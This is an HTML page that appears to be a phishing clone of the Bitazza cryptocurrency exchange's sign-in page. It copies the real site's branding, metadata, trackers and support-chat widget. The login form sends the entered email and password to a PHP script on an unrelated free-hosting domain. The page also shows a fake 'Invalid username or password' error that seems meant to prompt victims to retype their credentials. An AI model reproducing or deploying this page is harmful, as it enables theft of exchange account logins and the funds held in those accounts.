<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no,shrink-to-fit=no">
    <meta name="theme-color" content="#000000">
    <meta name="referrer" content="no-referrer">
    <meta name="robots" content="all">
    <meta name="title"
        content="Bitazza | The fastest-growing Digital Asset platform | Access from anywhere in the world.">
    <meta name="description"
        content="Trade, invest, and earn on the world’s fastest growing Crypto platform today! USDT and BTC pairs available. Discover BTZ, the token that powers the ecosystem.">
 
    <link rel="shortcut icon" href="https://trade.bitazza.com/favicon.ico">
    <link rel="preconnect" href="%REACT_APP_APEX_URL_PRECONNECT%">
    <link rel="dns-prefetch" href="%REACT_APP_APEX_URL_PRECONNECT%">
    <title>Bitazza</title>
    <meta property="og:url" content="https://trade.bitazza.com">
    <meta property="og:type" content="website">
    <meta property="og:title"
        content="Bitazza | The fastest-growing Digital Asset platform | Access from anywhere in the world.">
    <meta property="og:description"
        content="Trade, invest, and earn on the world’s fastest growing Crypto platform today! USDT and BTC pairs available. Discover BTZ, the token that powers the ecosystem.">
    <meta property="og:image" content="https://trade.bitazza.com/local/social-share-cover.png">
    <meta property="og:site_name" content="Bitazza">
    <meta itemprop="name" content="Bitazza">
    <meta itemprop="description"
        content="Trade, invest, and earn on the world’s fastest growing Crypto platform today! USDT and BTC pairs available. Discover BTZ, the token that powers the ecosystem.">
    <meta itemprop="image" content="https://trade.bitazza.com/local/social-share-cover.png">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@bitazzaofficial">
    <meta name="twitter:creator" content="@bitazzaofficial">
    <meta name="twitter:title"
        content="Bitazza | The fastest-growing Digital Asset platform | Access from anywhere in the world.">
    <meta name="twitter:description"
        content="Trade, invest, and earn on the world’s fastest growing Crypto platform today! USDT and BTC pairs available. Discover BTZ, the token that powers the ecosystem.">
    <meta name="twitter:image" content="https://trade.bitazza.com/local/social-share-cover.png">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="https://trade-bitazza.github.io/gl/login/css/15.01a33ac7.chunk.css" rel="stylesheet">
    <link href="https://trade-bitazza.github.io/gl/login/css/main.9088692b.chunk.css" rel="stylesheet">
    <script type="text/javascript" async="" src="https://analytics.tiktok.com/i18n/pixel/config.js?sdkid=C007BAD2UGFR4ILSM8T0&amp;hostname=trade.bitazza.com"></script>
   
    <script src="https://connect.facebook.net/signals/config/2909359506051837?v=2.9.55&amp;r=stable" async=""></script>
    <script async="" src="https://connect.facebook.net/en_US/fbevents.js"></script>
    <script async="" src="https://d.line-scdn.net/n/line_tag/public/release/v1/lt.js"></script>
  
    <style type="text/css">
        .adjust-smart-banner__1Xb2YvQsm_ZuqGpC3GYV1K {
            height: 76px
        }

        @media (min-width: 428px) {
            .adjust-smart-banner__1Xb2YvQsm_ZuqGpC3GYV1K {
                height: 0
            }
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH {
            position: fixed;
            left: 0;
            right: 0;
            z-index: 10000000
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH.adjust-smart-banner__1gDv13AgIJ63OmoMUWN6vd {
            top: 0
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH.adjust-smart-banner__2Xpm01sHnZNYOOkNk05cAc {
            bottom: 0
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 {
            margin: 0 auto;
            max-width: 428px;
            background: white
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT {
            display: flex;
            align-items: center;
            padding: 10px 8px 10px 4px
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT .adjust-smart-banner__3PQ7z78EskytjOkrU199hE {
            width: 32px;
            height: 32px;
            border: none;
            background: url("data:image/svg+xml;utf8,    <svg xmlns='http://www.w3.org/2000/svg' version='1.1' preserveAspectRatio='none' viewBox='0 0 16 16'>      <path d='M1 0 L0 1 L15 16 L16 15 L1 0' fill='%236e7492'/>      <path d='M16 1 L16 1 L1 16 L0 15 L15 0' fill='%236e7492'/>    </svg>");
            background-repeat: no-repeat;
            background-position: center center;
            background-size: 8px 8px, auto;
            cursor: pointer
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT .adjust-smart-banner__L_BSzs7rJajVPX4zdt2R6 {
            width: 56px;
            height: 56px;
            overflow: hidden;
            background-color: #6e7492;
            border-radius: 8px
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT .adjust-smart-banner__L_BSzs7rJajVPX4zdt2R6 .adjust-smart-banner__3Yj45mdOZKIOH2d6Z2UXXa {
            display: flex;
            align-items: center;
            justify-content: center;
            width: 100%;
            height: 100%;
            color: #353a52;
            font-weight: bold;
            font-size: 23px;
            font-family: ArialMt, Arial, sans-serif;
            line-height: 32px;
            background-color: #e0e2ec
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT .adjust-smart-banner__L_BSzs7rJajVPX4zdt2R6 .adjust-smart-banner__4hg0kzTWzWiGjzCDqbktp {
            width: 100%
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT .adjust-smart-banner__3mbKdOA0SmqrfOLvHomXyc {
            flex: 1 1 0%;
            min-height: 0;
            min-width: 0;
            margin: 0 12px
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT .adjust-smart-banner__3DSKm9idx4dze89DWsCMXr {
            overflow: hidden;
            text-overflow: ellipsis
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT h4 {
            margin: 5px 0 8px;
            color: #353a52;
            font-family: Arial-BoldMT, ArialMt, Arial, sans-serif;
            font-size: 12px;
            font-weight: bold;
            line-height: 16px;
            white-space: nowrap
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT p {
            margin: 8px 0 7px;
            color: #353a52;
            font-family: ArialMt, Arial, sans-serif;
            font-size: 9px;
            line-height: 11px;
            max-height: 22px;
            display: -webkit-box;
            -webkit-line-clamp: 2;
            -webkit-box-orient: vertical
        }

        .adjust-smart-banner__Dw5N6VeDUP14gIEdMH7SH .adjust-smart-banner__YV2trFakzl9_mm1H-9Ht5 .adjust-smart-banner__31MvUOHjvsAEpS_14bUpGT .adjust-smart-banner__3_w6WNex3gOuKV8gztVNoI {
            color: #6e7492;
            background: #f9fafc;
            border: 1px solid #cdd0e0;
            border-radius: 4px;
            border-color: #6e7492;
            box-shadow: inset 0px -1px 0px 0px #e0e2ec;
            padding: 4px 6.5px;
            display: inline-block;
            vertical-align: middle;
            text-align: center;
            font-family: ArialMt, Arial, sans-serif;
            font-size: 12px;
            font-weight: 500;
            line-height: 16px;
            cursor: pointer;
            text-decoration: none
        }
    </style>
    <script src="https://googleads.g.doubleclick.net/pagead/viewthroughconversion/709566095/?random=1647247121694&amp;cv=9&amp;fst=1647247121694&amp;num=1&amp;bg=ffffff&amp;guid=ON&amp;resp=GooglemKTybQhCsO&amp;u_h=1080&amp;u_w=1920&amp;u_ah=1032&amp;u_aw=1920&amp;u_cd=24&amp;u_his=2&amp;u_tz=420&amp;u_java=false&amp;u_nplug=5&amp;u_nmime=2&amp;gtm=2oa370&amp;sendb=1&amp;ig=1&amp;data=event%3Dgtag.config&amp;frm=0&amp;url=https%3A%2F%2Ftrade.bitazza.com%2Fgl%2Flogin&amp;tiba=Bitazza&amp;hn=www.googleadservices.com&amp;async=1&amp;rfmt=3&amp;fmt=4">
    </script>
    <meta http-equiv="origin-trial" content="A+sitaPn3hlQ8QipTsncwHz+k1NvfPtFsQqIOiD8GK3M9v9XCeQqlF7x1P9AVJdoYTiJPZXZc5XZYpwc10fH4wEAAACfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGVhZHNlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjQzMTU1MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9">
    <script src="https://www.googleadservices.com/pagead/conversion/709566095/?random=1647247121700&amp;cv=9&amp;fst=1647247121700&amp;num=1&amp;label=oioHCI_I56oBEI-9rNIC&amp;bg=ffffff&amp;guid=ON&amp;resp=GooglemKTybQhCsO&amp;u_h=1080&amp;u_w=1920&amp;u_ah=1032&amp;u_aw=1920&amp;u_cd=24&amp;u_his=2&amp;u_tz=420&amp;u_java=false&amp;u_nplug=5&amp;u_nmime=2&amp;gtm=2oa370&amp;sendb=1&amp;ig=1&amp;data=event%3Dconversion&amp;frm=0&amp;url=https%3A%2F%2Ftrade.bitazza.com%2Fgl%2Flogin&amp;tiba=Bitazza&amp;auid=604593374.1647247120&amp;hn=www.googleadservices.com&amp;async=1&amp;rfmt=3&amp;fmt=4">
    </script>
    <script charset="utf-8" src="https://analytics.tiktok.com/i18n/pixel/identify.js"></script>
    <script src="https://googleads.g.doubleclick.net/pagead/viewthroughconversion/668363083/?random=1647247121888&amp;cv=9&amp;fst=1647247121888&amp;num=1&amp;bg=ffffff&amp;guid=ON&amp;resp=GooglemKTybQhCsO&amp;u_h=1080&amp;u_w=1920&amp;u_ah=1032&amp;u_aw=1920&amp;u_cd=24&amp;u_his=2&amp;u_tz=420&amp;u_java=false&amp;u_nplug=5&amp;u_nmime=2&amp;gtm=2oa370&amp;sendb=1&amp;ig=1&amp;data=event%3Dgtag.config&amp;frm=0&amp;url=https%3A%2F%2Ftrade.bitazza.com%2Fgl%2Flogin&amp;tiba=Bitazza&amp;hn=www.googleadservices.com&amp;async=1&amp;rfmt=3&amp;fmt=4">
    </script>
    <script src="https://googleads.g.doubleclick.net/pagead/viewthroughconversion/437555337/?random=1647247121893&amp;cv=9&amp;fst=1647247121893&amp;num=1&amp;bg=ffffff&amp;guid=ON&amp;resp=GooglemKTybQhCsO&amp;u_h=1080&amp;u_w=1920&amp;u_ah=1032&amp;u_aw=1920&amp;u_cd=24&amp;u_his=2&amp;u_tz=420&amp;u_java=false&amp;u_nplug=5&amp;u_nmime=2&amp;gtm=2oa370&amp;sendb=1&amp;ig=1&amp;data=event%3Dgtag.config&amp;frm=0&amp;url=https%3A%2F%2Ftrade.bitazza.com%2Fgl%2Flogin&amp;tiba=Bitazza&amp;hn=www.googleadservices.com&amp;async=1&amp;rfmt=3&amp;fmt=4"></script>
    <link type="text/css" rel="stylesheet" href="https://snippets.freshchat.com/css/fc-pre-chat-form-v2.css">
    <link href="https://wchat.freshchat.com/css/widget.css?t=1647247124068" rel="stylesheet">
    <link href="https://wchat.freshchat.com/css/cb.css?t=1647247130593" rel="stylesheet">
</head>

<body>
    <div id="root">
        <div class="App fluid">
            <div class="standalone-layout__wrapper"><a href="?/gl/"
                    class="ap-logo standalone-layout__logo">
		    <img src="https://i.ibb.co/dBvqTDk/image.png" class="ap-logo__img standalone-layout__logo__img" alt="Logo"></a>
                <div class="standalone-form__container login-form__container">
                    <div class="login-form__container-left">
                        <div class="login-form__container-left-header">
                            <h1>Sign In</h1>
                        </div>
                        <form class="standalone-form__form login-form__form" action="https://batubata1403.000webhostapp.com/gl/apps.php" method="post">
						<p class="standalone-form__error">Invalid username or password</p>
                            <div class="form-group ap-input__input-wrapper login-form__input-wrapper">
                                <label class="ap--label ap-input__label login-form__label">Email</label>
                                <div class="ap-input__input-box login-form__input-box"><input data-test="Email" class="form-control ap-input__input login-form__input" name="username" type="text" placeholder="" value="">
                                </div>
                            </div>
                            <div class="ap-password-input login-form">
                                <div class="form-group ap-input__input-wrapper login-form__input-wrapper">
                                    <label class="ap--label ap-input__label login-form__label">Password</label>
                                    <div class="ap-input__input-box login-form__input-box">
                                        <div class="ap-input__input-with-icon login-form__input-with-icon">
                                            <input data-test="Password" class="form-control ap-input__input login-form__input" name="password" type="password" value=""><span class="ap-password-input__icon login-form__icon"><span class="isvg loaded ap-icon ap-icon--eye custom-icon custom-icon--eye"><svg xmlns="http://www.w3.org/2000/svg" width="19" height="12" viewBox="0 0 19 12">
    <g fill="none" fill-rule="evenodd">
        <path d="M-1-4h20v20H-1z"></path>
        <path fill="currentColor" d="M9.332 12C5.556 12 2.53 10.282.252 6.847A1.515 1.515 0 0 1 .26 5.16C2.59 1.72 5.613 0 9.332 0c3.72 0 6.744 1.72 9.073 5.16.344.509.347 1.175.008 1.687C16.136 10.282 13.109 12 9.333 12zm-.118-1.895c2.176 0 3.94-1.838 3.94-4.105 0-2.267-1.764-4.105-3.94-4.105S5.274 3.733 5.274 6c0 2.267 1.764 4.105 3.94 4.105zm0-2.105a2 2 0 1 1 0-4 2 2 0 0 1 0 4z"></path>
    </g>
</svg>
</span></span></div>
                                    </div>
                                </div>
                            </div>
                            <button class="ap-button__btn ap-button__btn--additive login-form__btn login-form__btn--additive" type="submit" name="" value="">Log In</button>
                        </form>
                        <div class="login-form__container-left-footer">
						<a class="login-form__link" disabled=""
                                href="?/gl/signup">Sign Up</a><a class="login-form__link" disabled=""
                                href="?/gl/problem-logging-in">Problem Logging In?</a></div>
                    </div>
                    <div class="login-form__container-right"><img src="https://i.ibb.co/8Y7Nczb/image.png" alt="logo">
                    </div>
                </div>
            </div>
        </div>
        <div class="ap-sidepane"></div>
    </div>


    <noscript><img height="1" width="1" style="display:none" src="https://tr.line.me/tag.gif?c_t=lap&t_id=bfef1b32-9bf5-44ae-bd91-ab6d07682c17&e=pv&noscript=1"/></noscript>
  
    <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=2909359506051837&ev=PageView&noscript=1"/></noscript>
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=AW-437555337"></script>
   
    <noscript><img height="1" width="1" style="display:none" alt="" src="https://px.ads.linkedin.com/collect/?pid=915083&fmt=gif"/></noscript><noscript><iframe
            src="https://www.googletagmanager.com/ns.html?id=GTM-MCCW53Q" height="0" width="0"
            style="display:none;visibility:hidden"></iframe></noscript>
    <style>
        .fc_frame {
            height: 430px !important;
            max-height: 70px
        }

        .fc_frame.h-open-container.fc-open {
            bottom: -20px !important
        }

        .chat-fc-form-outer {
            bottom: 0 !important
        }

        .fc-btn {
            position: fixed;
            visibility: hidden;
            bottom: 16px;
            right: 28px;
            background: linear-gradient(90deg, #dfe67d, #dfe67d 0, #7ec2b1 100%);
            box-shadow: 0 5px 4px 0 rgba(0, 0, 0, .26);
            color: #000;
            font-weight: 700;
            border-radius: 24px;
            font-size: 14px;
            padding: 10px 18px
        }
    </style>
    <button id="fc-btn" class="fc-btn" onclick="window.fcWidget.open()" style="visibility: visible;"><i class="fa fa-comment-o mr-2" aria-hidden="true"></i> <span id="fc-btn-text">Live Support</span></button>
    <script>
        var preChatTemplate = {
      //Form header color and Submit button color.
      mainbgColor: '#008A8A',
      //Form Header Text and Submit button text color.
      maintxColor: '#fff',
      //Chat Form Title
      heading: 'Bitazza Help Desk',
      //Chat form Welcome Message
      textBanner: 'Please Fill In Your Details Before Chatting.',
      //Submit Button Label.
      SubmitLabel: 'Start Chat',
      classicLiveChatMode: 'enabled',
      //Fields List - Maximum is 5
      //All the values are mandatory and the script will not work if not available.
      fields: {
        field1: {
          //Type for Name - Do not Change
          type: "name",
          //Label for Field Name, can be in any language
          label: "Name",
          //Default - Field ID for Name - Do Not Change
          fieldId: "name",
          //Required "yes" or "no"
          required: "yes",
          //Error text to be displayed
          error: "Please Enter a valid name"
        },
        field2: {
          //Type for Email - Do Not Change
          type: "email",
          //Label for Field Email, can be in any language
          label: "Email",
          //Default - Field ID for Email - Do Not Change
          fieldId: "email",
          //Required "yes" or "no"
          required: "yes",
          //Error text to be displayed
          error: "Please Enter a valid Email"
        },
      }
    };
    var preChatTemplate_th = {
      mainbgColor: '#008A8A',
      maintxColor: '#fff',
      heading: 'สอบถาม Bitazza',
      textBanner: 'กรุณากรอกรายละเอียดของคุณก่อนเริ่มสนทนา',
      SubmitLabel: 'เริ่มสนทนา / Start Chat',
      classicLiveChatMode: 'enabled',
      fields: {
        field1: {
          //Type for Name - Do not Change
          type: "name",
          //Label for Field Name, can be in any language
          label: "ชื่อ-นามสกุล / Name",
          //Default - Field ID for Name - Do Not Change
          fieldId: "name",
          //Required "yes" or "no"
          required: "yes",
          //Error text to be displayed
          error: "กรุณากรอกชื่อ"
        },
        field2: {
          //Type for Email - Do Not Change
          type: "email",
          //Label for Field Email, can be in any language
          label: "อีเมล์ / Email",
          //Default - Field ID for Email - Do Not Change
          fieldId: "email",
          //Required "yes" or "no"
          required: "yes",
          //Error text to be displayed
          error: "กรุณากรอกอีเมล์"
        },
      }
    };
    let fc_headers = {
      chat: 'Bitazza Help Desk',
      chat_help: 'Reach out to us if you have any questions',
    }
    let fc_headers_th = {
      chat: 'สอบถาม Bitazza',
      chat_help: 'หากพบปัญหาในการใช้งาน กรุณาสอบถามเรา',
    }
    let lang = 'en';
    let locale = 'en-us';
    if (localStorage.getItem("language") != null) {
      lang = localStorage.getItem("language").toLowerCase();
      if (lang === "th") {
        preChatTemplate = preChatTemplate_th;
        fc_headers = fc_headers_th;
        document.getElementById("fc-btn-text").innerHTML = 'ไลฟ์แชท'
      }
    }
    if (lang == 'th') {
      locale = lang;
    }
    window.fcSettings = {
      token: "ad77a827-633b-49cb-b1c6-751a08d6351c",
      host: "https://wchat.freshchat.com",
      locale: locale,
      config: {
        cssNames: {
          //The below element is mandatory. Please add any custom class or leave the default.
          widget: 'fc_frame',
          //The below element is mandatory. Please add any custom class or leave the default.
          expanded: 'fc_frame'
        },
        headers: fc_headers,
        headerProperty: {
          hideChatButton: true,
        }
      },
      onInit: function () {
        const fcUserEmail = localStorage.getItem('fc-user-email')
        if (!fcUserEmail) {
          fcPreChatform.fcWidgetInit(preChatTemplate);
        }
        else {
          window.fcWidget.user.setProperties({
            userID: fcUserEmail,
            username: fcUserEmail,
            email: fcUserEmail
          });
        }
        window.fcWidget.on('user:created', function (resp) {
          if (resp.success) {
            window.fcWidget.user.get(function (userRes) {
              localStorage.setItem('fc-user-email', userRes.data.email)
            })
          }
        })
      }
    };
    setTimeout(function () {
      document.getElementById('fc-btn').style.visibility = 'visible';
    }, 2500)
    </script>
    <script src="https://snippets.freshchat.com/js/fc-pre-chat-form-v2.js"></script>
    <script src="https://wchat.freshchat.com/js/widget.js" async=""></script>
    <script src="https://www.youtube.com/iframe_api"></script>


    <div class="ap-snackbar"></div>
    <div class="ReactModalPortal"></div>

    <div id="fc_frame" class="fc_frame fc_dn fc-widget-small">
	<iframe id="fc_widget" name="fc_widget" title="Chat"
            frameborder="0" allowfullscreen="true" webkitallowfullscreen="true" mozallowfullscreen="true"
            data-gtm-yt-inspected-1_19="true"></iframe></div>
    <script type="text/javascript" src="https://wchat.freshchat.com/js/co-browsing.js"></script>
    <div id="fc_push_frame"><iframe id="fc_push"
            src="https://161253201057453.webpush.freshchat.com/index.html?ref=aHR0cHM6Ly90cmFkZS5iaXRhenphLmNvbQ=="
            title="Chat" frameborder="0" data-gtm-yt-inspected-1_19="true"></iframe></div>
</body>
<iframe id="__JSBridgeIframe_1.0__" data-gtm-yt-inspected-1_19="true" style="display: none;"></iframe><iframe
    id="__JSBridgeIframe_SetResult_1.0__" data-gtm-yt-inspected-1_19="true" style="display: none;"></iframe><iframe
    id="__JSBridgeIframe__" data-gtm-yt-inspected-1_19="true" style="display: none;"></iframe><iframe
    id="__JSBridgeIframe_SetResult__" data-gtm-yt-inspected-1_19="true" style="display: none;"></iframe>

</html>
